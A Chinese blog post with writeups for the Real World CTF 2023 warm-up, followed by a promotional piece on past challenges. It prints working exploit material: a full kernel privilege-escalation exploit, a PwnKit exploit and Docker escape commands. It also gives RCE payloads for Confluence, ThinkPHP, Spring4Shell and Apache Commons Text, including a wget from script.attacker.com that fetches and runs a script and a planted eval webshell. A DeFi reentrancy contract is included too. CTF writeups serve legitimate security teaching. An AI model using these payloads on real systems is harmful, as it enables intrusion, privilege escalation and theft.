第五届 Real World CTF 体验赛落下帷幕

来自企业、高校和长亭合作伙伴的239支战队

1000+人集结体验赛

192次签到题解出,

15次一血,

有效flag提交851次


最终,由来自北京邮电大学的天枢Dubhe战队以2268的总分、解出14题获得第一名,而去年的冠军团队,来自众多高校联合(南京大学,南京邮电、东南大学、中国矿业大学等)的SU战队以2187的总分获得第二名,由来自西安电子科技大学的L-team战队以总分2166名列第三名。


以下为本次体验赛所有题目的Writeup。



Pwn


Digging into Kernel 3
题目在5.19.0版本的Linux Kernel上运行了一个有漏洞的驱动,驱动代码比较简单,包括uaf,race condition,memory leak等多个漏洞。通过漏洞驱动获取root权限有很多种方法,这里贴出作者old-school的exploit代码(并非最简单的方法,甚至相对复杂,使用USMA/DirtyCred等手段可以写出更简洁更稳定的exploit)

#define _GNU_SOURCE#include <sched.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <ctype.h>#include <err.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>#include <sys/timerfd.h>#include <sys/ioctl.h>#include <sys/syscall.h>#include <linux/keyctl.h>
// user_key_payload#define size_user_key_payload (24)// (gdb) ptype /o struct user_key_payload// /* offset    |  size */  type = struct user_key_payload {// /*    0      |    16 */    struct callback_head {// /*    0      |     8 */        struct callback_head *next;// /*    8      |     8 */        void (*func)(struct callback_head *);// //                                /* total size (bytes):   16 *///                            } rcu;// /*   16      |     2 */    unsigned short datalen;// /* XXX  6-byte hole  */// /*   24      |     0 */    char data[];// //                            /* total size (bytes):   24 *///                          }
int key_alloc(char *description, char *payload, int payload_len) {    return syscall(        __NR_add_key,        "user",        description,        payload,        payload_len,        KEY_SPEC_PROCESS_KEYRING    );}
void key_spray(int *keys, int spray_count, char *payload, int payload_len, char *description, int description_len) {    char *tmp_desc = (char *)malloc(description_len + 100);    memset(tmp_desc, 0, description_len + 100);    memcpy(tmp_desc, description, description_len);    for(int i = 0; i < spray_count; i++) {        snprintf(tmp_desc + description_len, 100, "_%d", i);        keys[i] = key_alloc(tmp_desc, payload, payload_len);        if(keys[i] == -1) {            perror("add_key");            printf("failed index: %d\n", i);            // break;            exit(-1);        }    }    free(tmp_desc);}
int key_revoke(int key_id) {    return syscall(        __NR_keyctl,        KEYCTL_REVOKE,        key_id,        0,        0,        0    );}
int key_free(int key_id) {    return syscall(        __NR_keyctl,        KEYCTL_UNLINK,        key_id,        KEY_SPEC_PROCESS_KEYRING    );}

int key_read(int key_id, char *retbuf, int retbuf_len) {    return syscall(        __NR_keyctl,        KEYCTL_READ,        key_id,        retbuf,        retbuf_len    );}// user_key_payload



// utilsvoid breakpoint() {    printf("press enter to continue...\n");    getchar();}
#ifndef HEXDUMP_COLS#define HEXDUMP_COLS 16#endif
void hexdump(void *mem, unsigned int len) {    putchar('\n');    for(int i = 0; i < len + ((len % HEXDUMP_COLS) ? (HEXDUMP_COLS - len % HEXDUMP_COLS) : 0); i++) {        /* print offset */        if(i % HEXDUMP_COLS == 0) {            printf("0x%06x: ", i);        }
        /* print hex data */        if(i < len) {            printf("%02x ", 0xFF & ((char*)mem)[i]);        }        /* end of block, just aligning for ASCII dump */        else {                    printf("   ");        }
        /* print ASCII dump */        if(i % HEXDUMP_COLS == (HEXDUMP_COLS - 1)) {            for(int j = i - (HEXDUMP_COLS - 1); j <= i; j++) {                 /* end of block, not really printing */                if(j >= len) {                    putchar(' ');                }                /* printable char */                else if(isprint(((char*)mem)[j])) {                    putchar(0xFF & ((char*)mem)[j]);                }                 /* other char */                else {                    putchar('.');                }            }            putchar('\n');        }    }    putchar('\n');}// utils
// here we startstruct add_param {    int idx;    int size;    char *cont;};
int g_fd;int seq_fd;unsigned long long g_vmlinux = 0;unsigned long long g_modprobe_path = 0;unsigned long long g_do_task_dead = 0;unsigned long long g_heap = 0;
unsigned long long pop_rax_ret = 0;unsigned long long pop_rcx_ret = 0;unsigned long long pop_rdi_ret = 0;unsigned long long mov_ptr_rax_rdi_ret = 0;unsigned long long ret = 0;

void setup() {    g_fd = open("/dev/rwctf", O_RDWR);    printf("g_fd = %d\n", g_fd);
    system("echo '#!/bin/sh\nchmod 777 /flag' > /tmp/x");    system("chmod +x /tmp/x");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");    system("chmod +x /tmp/dummy");
    if(fork()) {        sleep(3);        system("/tmp/dummy 2>/dev/null");        system("ls -l /flag");        system("cat /flag");        exit(1);    }}
void add(int idx, int size, char* cont) {    struct add_param arg = {        .idx = idx,        .size = size,        .cont = cont,    };
    ioctl(g_fd, 0xdeadbeef, &arg); // no error check}
void delete(int idx) {    ioctl(g_fd, 0xc0decafe, &idx); // no error check}
void leak() {    int OBJ_SIZE = 0x100;    char *cont = malloc(OBJ_SIZE);     memset(cont, 'x', OBJ_SIZE);
    add(0, OBJ_SIZE, cont);    delete(0); // first free
    int SPRAY_USER_KEY_SIZE = OBJ_SIZE - size_user_key_payload;    int SPARY_USER_KEY_CNT = 50;    int *keys = malloc(SPARY_USER_KEY_CNT * sizeof(int));    char *user_key_payload = malloc(SPRAY_USER_KEY_SIZE);    memset(user_key_payload, 'y', SPRAY_USER_KEY_SIZE);    key_spray(keys, SPARY_USER_KEY_CNT, user_key_payload, SPRAY_USER_KEY_SIZE, "spray_key", strlen("spray_key"));
    delete(0); // double free
    *(unsigned long long *)&cont[0x0] = 0;    *(unsigned long long *)&cont[0x8] = 0;    *(unsigned long long *)&cont[0x10] = 0x2000; // user_key size    for(int i = 0; i < 100; i++) {        add(1, OBJ_SIZE, cont);    }
    char *recv_payload = malloc(0x2000);    int anchor = 0;    for(int i = 0; i < SPARY_USER_KEY_CNT; i++) {        memset(recv_payload, 0, 0x2000);        int retval = key_read(keys[i], recv_payload, 0x2000);        // printf("retval = %d\n", retval);        if(retval > SPRAY_USER_KEY_SIZE) {            printf("find anchor %d\n", anchor);            printf("we leaked something...\n");            anchor = i;            break;        }    }
    if(anchor == 0) {        err(-1, "bad luck, try again!\n");    }
    for(int i = 0; i < SPARY_USER_KEY_CNT; i++) {        if(i != anchor) {            key_revoke(keys[i]);        }    }
    memset(recv_payload, 0, 0x2000);    int retval = key_read(keys[anchor], recv_payload, 0x2000);    // printf("retval = %d\n", retval);    if(retval > SPRAY_USER_KEY_SIZE) {        // hexdump(recv_payload, 0x200);        unsigned long long heap = *(unsigned long long *)&recv_payload[0xe8];        unsigned long long _user_free_payload_rcu = *(unsigned long long *)&recv_payload[0xf0];        unsigned long long needle = *(unsigned long long *)&recv_payload[0x100];        if(needle == 0x7979797979797979 && heap && _user_free_payload_rcu) {            printf("leaked heap @ 0x%llx\n", heap);            printf("leaked user_free_payload_rcu @ 0x%llx\n", _user_free_payload_rcu);            g_vmlinux = _user_free_payload_rcu - 0x339d8210;            printf("vmlinux @ 0x%llx\n", g_vmlinux);            g_modprobe_path = g_vmlinux + 0x34e510a0;            // printf("modprobe_path @ 0x%llx\n", g_modprobe_path);            g_do_task_dead = g_vmlinux + 0x336a3190;            pop_rax_ret = g_vmlinux + 0x33600ddb; // pop rax; ret            pop_rcx_ret = g_vmlinux + 0x33662de3; // pop rcx; ret            pop_rdi_ret = g_vmlinux + 0x3366ab4d; // pop rdi; ret            mov_ptr_rax_rdi_ret = g_vmlinux + 0x337b614a; // mov qword ptr [rax], rdi; ret            ret = g_vmlinux + 0x33600341; // ret        }    }
    sleep(1); // free user_key    for(int i = 0; i < 100; i++) {        close(keys[i]);    }
    // // place gadgets    // memset(cont, '!', OBJ_SIZE);    // for(int i = 0; i < 100; i++) {    //     add(1, OBJ_SIZE, cont);    // }}
void hijack() {    int OBJ_SIZE = 0x20; //    char *cont = malloc(OBJ_SIZE);     memset(cont, 'z', OBJ_SIZE);
    add(0, OBJ_SIZE, cont);    delete(0); // first free
    seq_fd = open("/proc/self/stat", O_RDONLY);    delete(0); // second free

    unsigned char fake_seq_operations[OBJ_SIZE];    memset(fake_seq_operations, '0', OBJ_SIZE);    // *(unsigned long long *)&fake_seq_operations[0x00] = 0x1111111111111111;                 *(unsigned long long *)&fake_seq_operations[0x00] = g_vmlinux + 0x3388f732; // ret 0x160    *(unsigned long long *)&fake_seq_operations[0x08] = ret;                 *(unsigned long long *)&fake_seq_operations[0x10] = ret;                 *(unsigned long long *)&fake_seq_operations[0x18] = pop_rax_ret;
    for(int i = 0; i < 1; i++) {        add(1, OBJ_SIZE, fake_seq_operations);    }
    __asm__(        "mov r15, pop_rax_ret;"        "mov r14, g_modprobe_path;"        "mov r13, pop_rdi_ret;"        "mov r12, 0x0000782f706d742f;" // /tmp/x\x00        "mov rbp, mov_ptr_rax_rdi_ret;"        "mov rbx, g_do_task_dead;"        "mov r11, 0x77777777;"        "mov r10, 0x88888888;"        "mov r9,  0x99999999;"        "mov r8,  0xaaaaaaaa;"        "mov rcx, 0x666666;"        "mov rdx, 8;"        "mov rsi, rsp;"        "mov rdi, seq_fd;"        "xor rax, rax;"        "syscall"    );    // read(seq_fd, fake_seq_operations, 1);

}
int main() {    setup();    leak();
    // breakpoint();    hijack();
    // breakpoint();
    return 0;}


Be-a-PK-LPE-Master

连接端口后,题目提示默认用户名为 user, 空口令登陆。 



发现需要提权才能获取 flag ,从题目名称中可以猜测出我们需要利用 pkexec 的漏洞进行提权, 故尝试使用 CVE-2021-4034 进行提权。


exploit 参考:

#include <stdio.h>#include <stdlib.h>#include <unistd.h>
char *shell =   "#include <stdio.h>\n"  "#include <stdlib.h>\n"  "#include <unistd.h>\n\n"  "void gconv() {}\n"  "void gconv_init() {\n"  "  setuid(0); setgid(0);\n"  "  seteuid(0); setegid(0);\n"  "  system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"  "  exit(0);\n"  "}";
int main(int argc, char *argv[]) {  FILE *fp;  system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");  system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");  fp = fopen("pwnkit/pwnkit.c", "w");  fprintf(fp, "%s", shell);  fclose(fp);  system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");  char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };  execve("/usr/bin/pkexec", (char*[]){NULL}, env);}

这里还有一个小故事, 新版的 Kernel 会处理 execve 的 argv[0] 是 NULL 的情况,因此 pkexec 这个漏洞在较新版本 Kernel 是不能用的 。 具体情况可以参考:

Handling argc==0 in the kernel [LWN.net] (https://lwn.net/Articles/882799/



Be-a-Docker-Escaper-2


通过 ssh 获取题目 shell 后,可以发现是在容器环境中。仔细看根目录可以看到容器环境将 HOST 的 /proc/sys/fs/binfmt_misc/ 目录映射到了容器的 /binfmt_misc


通过了解资料知道 Linux 内核有一个名为Miscellaneous Binary Forma(binfmt_misc)的机制,可以通过要打开文件的特性来选择到底使用哪个程序来打开。这种机制可以通过文件的扩展名或文件开始位置的特殊的字节(Magic Byte)来判断应该如何打开文件


其 binfmt 的格式如下:
name:type:offset:magic:mask:interpreter:flags

这个配置中每个字段都用冒号 : 分割,某些字段拥有默认值可以跳过,但是必须保留相应的冒号分割符。

各个字段的意义如下:

  • name:规则名

  • type:表示如何匹配被打开的文件,值为 E 或 M 。E 表示根据扩展名识别,而 M 表示根据文件特定位置的 Magic Bytes来识别

  • offset:type字段设置成 M 之后有效,表示查找 Magic Bytes的偏移,默认为0

  • magic:表示要匹配的 Magic Bytes,type 字段为 M 时,表示文件的扩展名,扩展名是大小写敏感的,不需要包含 .。type字段为 E 时,表示 Magic Bytes,其中不可见字符可以通过 \xff 的方式来输出

  • mask:type字段设置成 M 之后有效,长度与 Magic Bytes 的长度一致。如果某一位为1,表 magic 对应的位匹配,为0则忽略。默认为全部匹配

  • interpreter:启动文件的程序,需要是绝对路径

  • flags: 可选字段,控制 interpreter 打开文件的行为,共支持 POCF 四种flag

因此我们可以注册一个自己的 binfmt, 然后让其 HOST 执行相应的文件,就可以完成逃逸。关键是如何在 HOST 执行相应的文件。观察出题人给的条件,  出题人给了 ssh 登陆的途径。

我们通过 strace sshd 进程 ,会发现 sshd 服务当有 ssh 尝试连接的时候会执行一些 bash 脚本,例如 etc/update-motd.d/00-header


至此打通了逃逸的路径

完整利用过程:


1、首先注册一个自己的 binfmt

echo ":test:M::\x23\x21\x2f\x62\x69\x6e\x2f\x73\x68::/var/lib/docker/overlay2/$overlay/diff/tmp/exploit:" > /binfmt_misc/register

例如上一条语句,即为注册一个名 test, magic 为 #!/bin/sh , interpreter位于 /var/lib/docker/overlay2/$overlay/diff/tmp/exploit 的 binfmt ,其中 $overlay2 我们可以在 docker 中使用  mount 命令来获取

2、往 /var/lib/docker/overlay2/$overlay/diff/tmp/exploit 写入我们要执行的命令

echo '#!/bin/bash' > /tmp/exploitecho "docker cp /root/flag $container:/tmp/" >> /tmp/exploitchmod 777 /tmp/exploit


3、最后再使用 ssh 登陆一次即可获取 flag



Be-a-Docker-Escaper-3


首先查看内核版本 ,可以发现是一个比较旧的内核版本



再结合题目描述和名字,可以知道这题应该需要使用 CVE-2016-5195 也就是著名的DirtyCOW 漏洞来进行容器逃逸。


想要使用 DirtyCOW 进行容器逃逸,需要使用 DirtyCOW-vDSO 的利用方式,也就是通过 DirtyCOW 覆盖 vDSO 数据来实现对容器的逃逸。但是现有最著名的 vDSO 逃逸利用https://github.com/scumjr/dirtycow-vdso存在以下两个问题:

  1. 该利用使用 ptrace 方式来实现对 vDSO 内存的修改触发 COW,但是新版本 docker 默认禁止 ptrace

  2. 该利用对 vDSO 的 patch 选择的位置在 ubuntu 的内核里触发不了,需要换一个 patch 点


本着不能只有自己被坑的原则,出了这题。


需要将原来的ptrace利用方式换回 /proc/self/mem 利用并且更换触发点。或者不想改也可以重写一遍DirtyCOW利用即可。利用参考

https://github.com/zh-explorer/dirtycow.git


利用流程如下:

pip install -i https://pypi.tuna.tsinghua.edu.cn/simple pyelftoolsgit clone https://github.com/zh-explorer/dirtycow.gitcd  dirtycowmkdir buildcd buildcmake ..make./dirtycow {IP} 31337




Be-a-BUS-Driver


题目中运行了一个 D-Bus 服务, 通过 busctl --system --list 命令可以列出当前注册的 system D-Bus 服务, 其中有一个叫 ezbus 的尤其可疑。



通过 busctl introspect org.dbus.rwctf /org/dbus/rwctf 命令可以列出其实现的方法名, 例如可以看到其实现了一个名为 SayBoss 的方法,接受字符串参数。



打开 IDA 进行逆向, 找到 SayBoss 方法



发现 count 变量计算了调用该函数的次数,如果大于 0xA ,即可执行命令。


因此我们只需调用往 /tmp/exp.sh 写入我们要执行的命令, 然后使用下面这句命令调用超过 10 次即可。


busctl --system call org.dbus.rwctf /org/dbus/rwctf org.dbus.rwctf1 SayBoss s "/tmp/exp.sh"






Web


Be-a-Wiki-Hacker



根据页面上显示的版本 7.13.6,搜索 Confluence 历史漏洞,可以发现 CVE-2022-26134 这个表达式注入漏洞是可以利用的,执行 id 命令的利用验证poc:


GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1Host: example.com:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: close


url 路径部分就是 ognl 表达式 url 编码后的内容,所以执行的表达式其实就是:


${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}


如果要拿服务器 shell 权限,可以反弹 shell,这里注意 Java 里 Runtime 直接传递字符串执行 exec 的话,命令里不支持 shell 语法特性(比如管道符、重定向等),以及这里由于 tomcat 处理 url 的安全特性,url 里不能出现编码后的斜线,所以可以执行最简单的,wget 从远程拉一个脚本下来然后执行,分三次执行:


${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("wget script.attacker.com").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("chmod +x index.html").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("bash index.html").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}


Evil MySQL Server



这题考查的是 mysql 连接到恶意服务器时,恶意服务端可以读取 mysql 客户端本地文件的特性利用。如果不了解这个安全问题的选手,也可以根据题目提示“Evil MySQL Server”进行 Google 查询,能找到相关的安全资料。本题在体验赛赛题讲解视频里也有更为详细的讲解,这里简单说下怎么做。


可以直接借助工具 MySQL Fake Server:https://github.com/fnmsd/MySQL_Fake_Server


用它在你自己的公网 vps 服务器上启动一个恶意的 mysql server,比如地址是 1.1.1.1,端口3306,然后打开题目,在表单里填上对应的服务器地址,用户名处填 fileread_/flag,提交。mysql fake server 就会收到请求,并读到 /flag 文件内容。


ApacheCommandText



由于 apache common text 在默认配置下会对数据进行递归解析。这道题对一些常见利用的字符串进行了过滤,但没有过滤base64decoder,因此我们可以使用base64decoder以及递归特性进行漏洞利用。


POC

${base64decoder:JHtzY3JpcHQ6SmF2YVNjcmlwdDp2YXIgYT1qYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiL3JlYWRmbGFnIik7dmFyIGI9YS5nZXRJbnB1dFN0cmVhbSgpO3ZhciBjPW5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKG5ldyBqYXZhLmlvLklucHV0U3RyZWFtUmVhZGVyKGIpKTtjLnJlYWRMaW5lKCk7fQ==}



Be-a-Langurage-Expert



这题考察的是 Thinkphp 多语言功能导致的任意文件包含,这个漏洞的影响范围如下

* ThinkPHP v6.0.1 <= v6.0. x <= v6.0.13

* ThinkPHP v5.1.x

* ThinkPHP v5.0.x


具体的漏洞分析可以参考:

http://tttang.com/archive/1865/


所以进入题目便可以看到,当前的 ThinkPHP 版本为 6.0.12 正好位于漏洞版本范围内,所以我们便可以进行任意文件包含。结合题目描述里面给出的信息,整个 ThinkPHP 是使用Docker进行部署的,所以我们可以使用: https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html 这个技巧, 利用 PearCMD 来最终实现RCE。


首先我们发送第一个包,用来创建一个 Webshell 在 /tmp/1.php:


GET /?+config-create+/&lang=../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_POST[a]);?>+/tmp/1.php HTTP/1.1Host: localhost:8888Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Connection: closeCache-Control: max-age=0

此时在 /tmp/1.php 中的内容就是 <?=@eval($_POST[a]);?>。我们之后只需要使用Webshell 管理工具连接如下地址即可。
http://your-ip:8888/?&lang=../../../../../../../../../../../tmp/1

最后执行 /readflag 获取 Flag

Yummy Api



这题考察的是 Yapi 通过页面信息我们可以得到当前 Yapi 的版本为 v1.10.2。在这个版本中我们可以进行如下操作最终实现 RCE,获取 Flag。

  1. 使用 Mongodb 注入拿到用户项目的 Token ,这一步需要爆破。

  2. 在默认情况下利用这个使用 aes192 加密 token,这样我们可以调用项目的任意功能,。

  3. 然后通过调用项目的 pre-script 功能,上传 vm2 的逃逸脚本实现 RCE。


具体的漏洞分析文章可以参考: 

https://www.anquanke.com/post/id/283779 


当然也可以找到一键利用的脚本:

https://raw.githubusercontent.com/vulhub/vulhub/e186e1817786817b484f4f196510478c57ac7ee3/yapi/mongodb-inj/poc.py


使用这个脚本我们只需要执行,即可拿到 Flag


py -3 .\poc.py --debug one4all -u http://ip:9090/ -c "/readflag"

Spring4Shell



该题主要结合 git 泄漏与2022年 top2 漏洞—— Spring4shell 相关背景。


解题思路一:


可以发现 .git 泄漏配置文件,导致 web 路径泄漏。


可使用工具:

https://github.com/gakki429/Git_Extract.git

$ python git_extract.py http://47.98.216.107:31584/.git/


查看 web 路径:

$ cat 47.98.216.107_31584/server.xml|grep appBase<Host name="XXXX"  appBase="chaitin"

python exploit.py --url http://47.98.216.107:31584/ --dir chaitin/ROOT


解题思路二:

修改 appBase,不需要获取 web 路径,此 payload 不常见,github 上检索不到。
payload:class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=/tmp&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.appBase=/






Misc



Long Range


通过题目描述 Long Range与频段 500.5Mhz (属于 LoRa 在中国常用的CN470-510频段) 结合猜测信号中是一段 LoRa 信号。 使用 SDRSharp 或其他工具加载 wav 文件,可以发现信号也比较符合 LoRa 的特征,进一步印证猜测并分析出所使用的带宽为125kHz。



使用 GNU Radio 的 OOT 模块 gr-lora,调整 SF 扩频因子, 在8时可以解出 flag。




Be-a-Famicom-Hacker


使用模拟器打开游戏,可以发现界面的 komani 1988被修改为了 RWCTF 2023,知晓 ROM 被修改。



最硬核的解题方式是通过 ROM 大小知道是日版的魂斗罗,然后下载原版 ROM diff 修改内容,然后逆向 ROM 代码,但游戏类题目一般只要探索过所有场景即可获得 flag。


通过搜索可以知道,魂斗罗存在一个隐藏彩蛋:在过关的结尾动画(包括滚动名单)期间,全程按住 Select+Start 键,即可见到一段隐藏的彩蛋,flag 就放在隐藏彩蛋中。



关于快速通关,

选关按下 START 后,在游戏画面变黑之前,同时按下 ←+↑+A+START,就可以进入选关菜单。

作弊

1.自带的经典作弊码,在标题画面BGM出现后按 上上下下左右左右BA 就会有30条命。

2.模拟器打开 CPU view,进入关卡,其中 0x32 位置为 1P 的生命数,0xB0 位置为1P无敌状态的剩余时间,可以修改/冻结这两个位置达到无限命+无敌的状态迅猛通关。





BlockChain


HappyFactory



本题考点为 Defi 项目的核心逻辑中,闪电贷功能易出现的重入漏洞。


解题思路1:


在调用 swap 合约闪电贷之前,调用 Token 的 Burn 接口。Burn 接口无 onlyOwner 限制,可直接调用。


Burn 掉 Pair 的部分 balance,然后调用 sync 函数调平。调平后的pair可swap出巨量Token。


解题思路2:


在调用 swap 合约的闪电贷功能时,重入未加 lock 限制的 sync 函数。在计算 K 值前,将 reserve 设为对自己有利的状态。


解题 Exploit 如下:

pragma solidity ^0.8.0;import "./Happy.sol";
contract Exploit {    event tokenA_tokenB(address, address);    IHappyFactory factory =        IHappyFactory(address(0xA2A21Fe2fD692b63Df06ECd5b0a783323B4eae36));    IHappyPair public pair;    IHappyERC20 public tokenA;    IHappyERC20 public tokenB;    address public gamer;
    constructor(address tokenA_address, address tokenB_address) {        gamer = msg.sender;        tokenA = IHappyERC20(tokenA_address);        tokenB = IHappyERC20(tokenB_address);        pair = IHappyPair(factory.getPair(tokenA_address, tokenB_address));    }
    function attack(uint256 amount0, uint256 amount1) public {        pair.swap(amount0, amount1, address(this), "0x");        tokenB.transfer(gamer, 1 ether);    }
    fallback() external {        pair.sync();        tokenA.transferFrom(gamer, address(pair), 1 ether);    }}




Crypto


babyCurve



题目的主要考察椭圆曲线同构。参考链接:

https://crypto.stackexchange.com/questions/61302/how-to-solve-this-ecdlp


根据题目我们可以知道椭圆曲线为y² = x*(x+1)²


然后我们发现椭圆曲线的判别式为 0 根据参考链接给出的方法 我们采用换元法修改成和上述链接一样的形式。



这时候就可以利用同构求出密钥x,然后一切问题都迎刃而解

下面提供下 exp


from Crypto.Util.number import *from Crypto.Cipher import AESp = 193387944202565886198256260591909756041P.<x> = GF(p)[]f = x^3 + 2*x^2 + xP = (4, 10)Q = (65639504587209705872811542111125696405,125330437930804525313353306745824609665)f_ = f.subs(x=x-1)print f_.factor()
P_ = (P[0] +1, P[1])Q_ = (Q[0] +1, Q[1])
t = GF(p)(p-1).square_root()u = (P_[1] + t*P_[0])/(P_[1] - t*P_[0]) % pv = (Q_[1] + t*Q_[0])/(Q_[1] - t*Q_[0]) % pprint(v.log(u))k = v.log(u)aes = AES.new(long_to_bytes(k).ljust(16, '\0'), AES.MODE_CBC, '\0'*16)flag = "b3669dc657cef9dc17db4de5287cd1a1e8a48184ed9746f4c52d3b9f8186ec046d6fb1b8ed1b45111c35b546204b68e0".decode("hex")print(len(flag))plaintext = aes.decrypt(flag)print(plaintext)




Reverse


SNAKE



安装 apk 运行发现是个贪吃蛇游戏,随着控制蛇吃到的食物越多,蛇的速度越快。所以如果你足够强可以坚持到最后,把 flag 吃出来。


分析 apk,由于贪吃蛇和食物本身所用资源都是图片,于是在 drawable 目录中可找到这些图片文件,并且可以发现除普通食物图片外,还有 b0,b1 这些字母图片,容易猜测到这些便是 flag 的组成部分。


在 onDraw 方法中注意到如下部分



a和b方法分别控制屏幕绘制食物或是 flag,由 this.c 控制




注意到拼装b图片时用到了 this.f 数组,交叉引用后定位到



比较容易猜到是 brainfuck,但是有点小改动,不能直接在线解密,仔细分析的话可以发现是[]<>互换了一下,图方便可以 hook 拿到返回值


function hook(){    Java.perform(function(){       var SecurityParams = Java.use("b.a.a.a");       SecurityParams.a.implementation = function(str){                var ret = this.a(str);                console.log(ret);                return ret;            }    });    }function main() {        hook()}
setImmediate(main)


数组中的元素即对应 drawable 目录中 flag 文件名,按顺序找出对应图片即可得到 flag,需要注意的是 this.v 在i函数中会先自增一次,所以 flag 从第1个元素开始取





Check-In


🐑了拼🐑



直接拼图就可以获取 flag





点分享
点收藏
点点赞
点在看

阅读原文

跳转微信打开

]]> Wed, 11 Jan 2023 18:15:00 +0800 RWCTF红宝书|赛题盘点:抓狂、emo? https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247500495&idx=1&sn=40b68c29709cbaf1e50ea00160a876a4 请注意:RWCTF体验赛日期变更!!! 长亭科技 2023-01-03 18:33 北京

请注意:RWCTF体验赛日期变更!!!


12月9日,第五届RWCTF正式开启报名!
作为以赛题质量过硬而在技术圈知名的的比赛
RWCTF的题目一直是备受关注、讨论和“吐槽”的?
出题师傅也是一直充满神秘,备受保护。



为了帮大家更好的准备第五届的比赛
小编在潜入出题组无果后
仔细研究了前四期比赛的赛题
为大家总结了一些代表性题目


希望可以对大家有所参考


只能帮到这了~



1、最抓狂题目:<PrintMD>

来自2018年线上入围赛


上榜理由从笑容到凝固,大概只需要一分钟


从比赛开始就被放出的“独孤求解“型题目,

多次给出Hint,却始终无一人能探破,

直到比赛结束的一分钟。

Flag:我应该在一分钟前,不应该在一分钟后






不过真的有很多强队在比赛结束后仍沉溺其中

继续冲击难题直至解出

在第四届比赛中

同样出现赛后几小时才解出题目的情况

或许已经无关分数,只有热爱吧。


解题思路:

赛后由长亭出题师傅亲自出品writeup, 想看看这只是线上入围赛就难倒众人的题目,欢迎点击查看。

Real World CTF | PrintMD writeup




2最emo题目:<Drinks>

来自2019年线下总决赛


上榜理由:开创签到题清奇解题风格


据说这道题,曾在2019年的线下赛场引起一阵“血雨腥风”

本来只是为了打声招呼“我来了”的签到题,

太过“骚操作”的解题姿势却让无数战队竞折腰。

你在说什么?我是谁?我在干什么?

从此开创了RWCTF签到题清奇的解题风格

甚至有战队一直参赛只为看今年RWCTF又会有什么超大脑洞?






或许先来个小互动

大家猜猜今年的签到题会是什么思路呢?

写下你的留言,

猜测最相近的小伙伴将获得RW定制礼品一份哦。


解题思路:

只需要参赛战队从事先摆放在桌上的多罐瓶身印有不同文字的饮品中,找出印有 rwctf{pwned_coke} 的那一罐即为成功。




3最浪漫技术题目:<Old System>

来自2020/2021年线上总决赛


上榜理由另类的技术浪漫好像也挺“要命“


有人说,技术可以是很浪漫的,

有人说,程序员的浪漫麻瓜们是不懂的

但在RWCTF,出题人的浪漫?

好像也不是那么能get。

将浮士德剧情的心脏变为石头,

结合破解的艺术和密码学、算法,

只能继续说:你在说什么?







不止将题目场景设置在各种实战的攻防场景中,

还要结合艺术。

看来RWCTF果然是“以技术难度高、接近真实世界体验感而著称的硬核赛事“呀


解题思路:

Voidfyoo师傅出品,必属精品,除了题目,还有Writeup,不管做过题还是没做过的小伙伴,都可以来围观一波了。

Real Wolrd CTF 3rd Writeup | Old System




4想胖揍出题人题目:<SVME>

来自2022年线上总决赛


上榜理由难度标签baby,实际却是让人哭的像baby


本来是为了更有针对性的选择解题顺序

结果却是一座理解能力的大坑,

一道题解2天,难哭一片人

当天便荣登题目吐槽榜榜首

甚至被众筹胖揍一顿出题人






一直以Real World为赛题风格,

不经二次开发,解题也是需要原汁原味代码

本道题目可真是将Real发挥到了极致呀


